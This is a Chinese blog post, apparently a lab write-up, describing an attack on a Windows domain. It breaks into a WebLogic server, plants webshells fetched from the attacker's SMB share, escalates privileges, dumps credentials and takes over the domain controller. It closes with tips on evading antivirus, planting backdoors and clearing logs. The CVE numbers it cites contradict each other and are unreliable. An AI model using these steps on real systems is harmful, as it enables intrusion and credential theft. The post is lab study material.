内网域攻击

最新推荐文章于 2024-05-25 18:35:48 发布
最新推荐文章于 2024-05-25 18:35:48 发布
阅读量2k 收藏 12
点赞数 2
文章标签: java 数据库 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56937298/article/details/125429247
版权

什么是域

计算机域是一个有安全边界的计算机集合,在同一个域中的计算机彼此之间已经建立了信任关系,在域内访问其他机器,不再需要被访问机器的许可。 具体参考计算机域_百度百科​​​​​​  。通俗来说就域就像一个家庭,域的大小只不过是家庭人多人少的关系,域控就像这个家庭的家长。内网域攻击的最终目的就是拿到这个家长的权限。

实验拓扑

实验环境

DC

IP:10.10.10.10 OS:Windows 2012(64)

应用:AD 域

WEB

IP1:10.10.10.80 IP2:192.168.111.80 OS:Windows 2008(64)

应用:Weblogic 10.3.6 MSSQL 2008

PC

IP1:10.10.10.201 IP2:192.168.111.201 OS:Windows 7(32)

攻击机

IP:192.168.111.3 OS:Kali

实验思路

.大致思路分析:

1、对目标机器进行信息收集,看相应的端口对应的服务,找服务所对应的版本信息、历史漏洞等

2、利用漏洞上传小马(必要做免杀)

3、用工具来连接小马上传大马

4、再用工具来来接大马

5、大马提权拿到目标机器的最高权限

6、对内网进行扫描,找到域控服务器

7、横向移动对拿到域服务器权限

入手思路:一个域能和外面联系的有WEB服务器,邮箱服务器,这里我们从WEB服务器进去,然后进行横向移动。

信息收集

这里可以查看到web服务器上面运行什么服务,什么端口开放粗略的看一下有什么端口能进行利用,这里因为是靶机就不采用暴力破解方法。

 因为是靶机所以知道afs3-callback存在漏洞,具体可以利用的漏洞可以上传脚本来检测7001端口

发现可以利用CVE-2018-2894这个漏洞。

漏洞分析

发现CVE-2019-2925漏洞

官方地址:cve-website

大致意思:构造一个特殊的http请求能够在目标机上执行命令

copy\\192.168.111.3\share\shell.jsp servers\AdminServer\tmp\_WL_internal\bea_wls9_async_response\8tpkys\war\1.jsp

在我的攻击机上面来进行共享一个含有木马的文件夹,在发送一个http请求,让目标机进行复制到指定的文件目录下

做上传小马准备工具冰蝎

 生成木马文件夹

 启动 smbserver 共享文件服务,将/root/Behinder/server 目录共享出去,共享的名称为 share

开始利用漏洞上传小马

在网上找到相应的模板进行填写,进行攻击。

 

 状态码返回202小马已经传上去了

连接小马并进行第二次信息收集

 小马能够运行无误,这里准备传大马

上传大马并提权

 这里我用的CS这款工具

 生成大马并连接

 通过冰蝎来传输大马同时把提权工具上传

成功拿到系统管理员权限,在域内权限提的是域管理员的权限。

 第三次信息收集

把内存中的登录的账号和密码导出来

导出的东西是加密的要在目标机上解密

 

信息收集的结果

账户               密码

de1ay/WEB   123.abc

de1ay/mssl   1qaz@WSX

Administarator 1qaz@WSX 找到域管理员的明文密码

域控服务器的名称DC

DNS服务器的内网IP 10.10.10.10

这里有了域管理员的账号和密码,就方便多了。我们可以通过下面这个命令找到域控

beacon> shell net group "domain controllers" /domain

通过我们这台机器(system权限)这个凭证来让域控服务器上线。

扫描内网主机

扫描内网主机有多少存活

发现存活给他上线

把整个域环境内的账户和密码导出来,密码是哈希值

实验后思路梳理

1、第一次信息收集,找到突破口信息收集找到相对应的版本信息和对应的版本漏洞(如果不清楚是否修复,全部试一下)

2、第一步找到的漏洞,通过CVE官网找到利用漏洞能做什么,不用登录可执行命令。

3、在攻击机上面创建一个共享文件,里面有对应的马,使用漏洞把马直接复制到web服务器上面,再用冰蝎连接,拿到相对应的用户权限。

4、第二次信息收集

5、通过冰蝎上传一个CS的大马,运行并反弹一个shell 回来(这时的shell权限是普通用户权限)。利用脚本提权工具进行提权。把得到的shell窗口是域管理员的权限。

6、把内存中存在的用户账户密码生成一个加密文件进行输出,把这个文件在目标机上面进行解密,再传递给攻击机,分析日志

7、第三次信息收集

8、把域服务器上线在cs上面利用提权完成的机器上线AD,导出存储的用户名和密码哈希值。

实验反思

  • 在做第一步时如果冒然进行测试漏洞,容易导致目标服务器不能进行正常工作从而容易被发现,可能会被反查。
  • 在传递大小马的时候没有做免杀,容易让目标机安装的一些杀毒软件如360、火绒、以及系统自带的病毒检测软件干掉
  • 在拿到目标权限以后,没有在目标机上生成后门和清除日志,增加了二次进入的难度和提高了被发现的概率
别内卷了
关注
  • 2
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
0x01.第一课 Metaspoilt漏洞利用命令详解.pdf
06-24
0x01.第一课 Metaspoilt漏洞利用命令详解.pdf
网络安全kali web安全 Kali之msf简单的漏洞利用
xueshenlaila的博客
03-08 1万+
信息收集 靶机的IP地址为:192.168.173.136 利用nmap工具扫描其开放端口、系统等 整理一下目标系统的相关信息 系统版本:Windows server 2003 开放的端口及服务: 21/tcp ftp 135/tcp msrpc 139/tcp netbios-ssn 445/tcp microsoft-ds 777/tcp multiling-http 1025/tcp NFS-or-IIS 1026/tcp LSA-or-nterm 1029/tcp ms
攻击 ----->约束&&非约束委派攻击
最新发布
huohaowen的博客
05-25 880
首先,什么是委派呢?委派是指将内用户的权限委派给服务账户,使得服务账号能够以用户的权限在内展开活动接着,什么样的对象才能被委派呢?主机账号:活动目中中的Computers组内的计算机,也被称为机器账号服务账号:内用户的一种类型,是服务器运行服务时所用的账号。那么我们去控上面看一看,顺便说一下本次实验环境后续实验环境皆在此基础上进行先来看机器账号,怎么查看内的机器有几台呢?完了喜欢eason被你发现捏然后我们去控上看,DEV和COMPUTERS这两个组。
Linux7081端口,网络-04-端口号-linux端口详解大全--TCP注册端口号大全
weixin_36180611的博客
04-30 3751
# John Murphy afs3-fileserver 7000/tcp file server itselfafs3-fileserver 7000/udp file server itselfafs3-callback 7001/tcp callbacks to cache managersafs3-callback...
内网安全:Msfconsole攻击技术(成功拿下服务器最高权限.)
网络安全领域___专研者.
03-22 1万+
Msfconsole工具概括: Msfconsole简称(msf)是一款常用的渗透测试工具,包含了常见的漏洞利用模块和生成各种木马,方便于安全测试人员的使用. (1)进行端口扫描. (2)进行服务的扫描.(3)扫描3306(Mysql)端口的弱口令.(4)在msf模块里也可以使用nmap进行扫描.(5)扫描了服务器是用Win XP,然后对服务器进行渗透测试.
Metasploit渗透测试魔鬼训练营
qq_37340753的博客
12-26 8234
信息搜集外围情报搜集物理机有网状态下物理机无网状态下个人推测获取的信息主机探测与端口扫描活跃主机扫描ICMP Ping命令Metasploit的主机发现模块arp_sweep使用方法使用Nmap进行主机探测-sn选项扫描-Pn选项扫描-PU选项 外围情报搜集 物理机有网状态下 物理机无网状态下 个人推测 是由于需要向比较权威的DNS服务器访问,然后在相应的DNS服务器上读取相应的数据库,然后给...
WebLogic wls-async 反序列化远程命令执行漏洞(CNVD-C-2019-48814)的复现过程
weixin_40950781的博客
09-01 1749
WebLogic wls-async 反序列化远程命令执行漏洞(CNVD-C-2019-48814)漏洞复现WebLogic wls-async 反序列化远程命令执行漏洞(CNVD-C-2019-48814)0x01 weblogic简介0x02漏洞简介0x03 影响的系统0x04 复现过程1. 复现环境及搭建过程1)靶机安装jdk2) 靶机搭建weblogic2. 漏洞利用0x05 cobalt...
公司企业网站管理系统
04-10
2. **增强的安全性**:通过加强身份验证和授权机制,保护企业数据免受黑客攻击。 3. **扩展的功能模块**:新增或改进了某些特定功能,如SEO优化、多语言支持、移动设备适配等。 4. **性能提升**:优化了后台处理逻辑...
商城购物系统
05-25
7. **安全性与性能优化**:购物系统需要防止各种网络攻击,如XSS跨站脚本攻击、CSRF跨站请求伪造等。同时,通过缓存机制、数据库优化、负载均衡等手段提高系统性能,保证在高并发情况下稳定运行。 8. **响应式设计*...
公司企业网站管理系统SQL正式版
10-31
安全性方面,系统可能集成了防火墙、SSL加密、登录验证等多种安全措施,防止恶意攻击和数据泄露。定期备份和恢复机制也是必不可少的,以防万一发生数据灾难时能迅速恢复业务。 总的来说,《网公司企业网站管理...
影视系统
05-30
5. **权限控制与安全**:用户管理模块的修复意味着系统具备用户注册、登录、权限控制等功能,同时也考虑到了安全措施,比如防止SQL注入、XSS攻击等。 6. **广告管理系统**:修复广告插件问题表明系统有集成广告投放...
基于大数据的APT攻击检测.pptx
09-18
应对“慢模式”,需要保留长时间窗口的历史记录数据,在时间窗口内处理所有攻击相关上下文信息。 Beehive是一个基于大数据的APT检测系统,它使用感知异常行为如提升权限、窃取敏感信息、破坏操作系统等来检测APT...
arp内网攻击
WEB渗透测试 从入门到萌新
04-18 2048
严正声明:本文仅限于技术讨论与分享,严禁用于非法途径。 本文目的 演示如何借助KaliLinux系统内置的 nmap、arpspoof、driftnet、ettercap、fping等渗透测试工具对局网内(同WIFI下)同一网段的PC主机、手机进行 ARP欺骗 和 流量监听,实现对目标主机/手机的 断网攻击、图片窃取、密码监听 等攻击目的。 工具 简介 arpspoof ARP欺骗的工具,可毒化受害者ARP缓存,将网关MA...
渗透知识-内网渗透(详细版本)
热门推荐
Jian Sun_的博客
02-11 2万+
1. 内网安全检查/渗透介绍 1.1 攻击思路 有2种思路: 攻击外网服务器,获取外网服务器的权限,接着利用入侵成功的外网服务器作为跳板,攻击内网其他服务器,最后获得敏感数据,并将数据传递到攻击者,看情况安装长期后门,实现长期控制和获得敏感数据的方式; 攻击办公网的系统、办公网电脑、办公网无线等方式,一般是采用社工,实现控制办公电脑,再用获得的办公网数据,可能是内网的各种登录账号和密码,再获取办公网或者生产网的有用数据。 一般内网安全检查使用第一种思路,实际的攻击2种思路结合实现。 1.2 敏感资
内网渗透:详解kerberoast攻击
A_991128a的博客
07-29 447
上篇文章介绍了kerberos的协议的认证流程以及可能出现的安全问题,也简要说了一下kerberoast攻击,本篇文章就具体介绍一下kerberoasting具体原理以及如何进行操作。关于内网相关的文章已经发了两篇了,大家感兴趣的话可以找以前的文章看一下,后面会继续出关于内网方面的知识。内网渗透:Kerberos认证协议安全性分析内网横移:抓取管理员密码首先再来回顾一下Kerberoast协议的认证过程。kerberoast认证过程算上PAC可以说有四个个阶段。如下图所示。
网络安全——局内网攻击手段(MAC地址攻击、ARP攻击、DHCP攻击
永远是少年
06-24 1万+
网络安全一直是信息安全的重要内容,而局网安全又往往是网络安全的一个重要组成部分。局网内有哪些攻击攻击手段呢?今天主要介绍MAC地址攻击、ARP攻击、DHCP攻击攻击的原理。要看懂本文,需要有一定的局网内交换知识、DHCP原理等的理解。 一、MAC地址攻击 1、MAC地址洪范攻击 所谓MAC地址洪范攻击,就是攻击者向局网内发送大量伪造MAC地址的数据包,意图占满局网内交换机的MAC地址转发表。由于交换机MAC地址表往往都具有一定的空间限制,当MAC地址表被占满后,就无法学习到新的MAC地址,因此,
查看linux系统所用的端口,Linux系统查看端口常用命令
weixin_42309866的博客
04-30 661
本机网络端口使用情况1.1 lsof -i列举当前所有端口连接信息,输出信息列表:COMMANDPIDUSERFDTYPEDEVICESIZENODENAME进程名称进程标识符用户文件描述符类型指定磁盘名称文件大小文件在磁盘上的标识打开文件确切名称(谁在访问)[root@localhost ~]# lsof -iCOMMAND PID USER FD TYPE DEVICE SI...
Linux - 常见端口和服务的对照和解释
wangcunhang的博客
04-23 696
著名端口 端口号码 / 层 名称 注释 1 tcpmux TCP 端口服务多路复用 5 rje 远程作业入口 7 echo Echo 服务 9 discard 用于连接测试的空服务 11 systat 用于列举连接了的端口的系统状态 13 daytime 给请求主机发送日期和时间 17 qotd 给连接了的主机发送每日格言 18 msp 消息发送协议 19 c...
警惕来自内部的攻击 内网安全不容忽视
weixin_68789096的博客
03-13 982
近几年,随着网络安全事件的频频发生,人们对外部入侵和INTERNET的安全日益重视,但来自内部网络的攻击却有愈演愈烈之势,内网安全成为企业管理的隐患。信息资料被非法流露、拷贝、篡改,往往给企业、政府或军队部门造成重大损失。使内部网络始终处于安全、可靠、保密的环境下运行,帮助企业各类业务统一优化、规范管理,保障各类业务正常安全运行,这就是内网安全管理产品能够带给我们的价值。
内网控信息需要收集哪些
03-31
1.名(Domain Name) 2.控制器IP地址(Domain Controller IP Address) 3.管理员账户信息(Domain Administrator Account Information) 4.控制器操作系统信息(Domain Controller Operating System Information) 5.用户账户信息(Domain User Account Information) 6.组账户信息(Domain Group Account Information) 7.策略信息(Domain Policy Information) 8.安全事件日志(Domain Security Event Logs) 9.用户登录日志(Domain User Login Logs) 10.组成员信息(Domain Group Member Information) 11.计算机信息(Domain Computer Information) 12.名服务器信息(Domain Name Server Information) 13.控制器配置信息(Domain Controller Configuration Information) 14.控制器远程访问日志(Domain Controller Remote Access Logs) 15.控制器备份和恢复信息(Domain Controller Backup and Recovery Information)

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值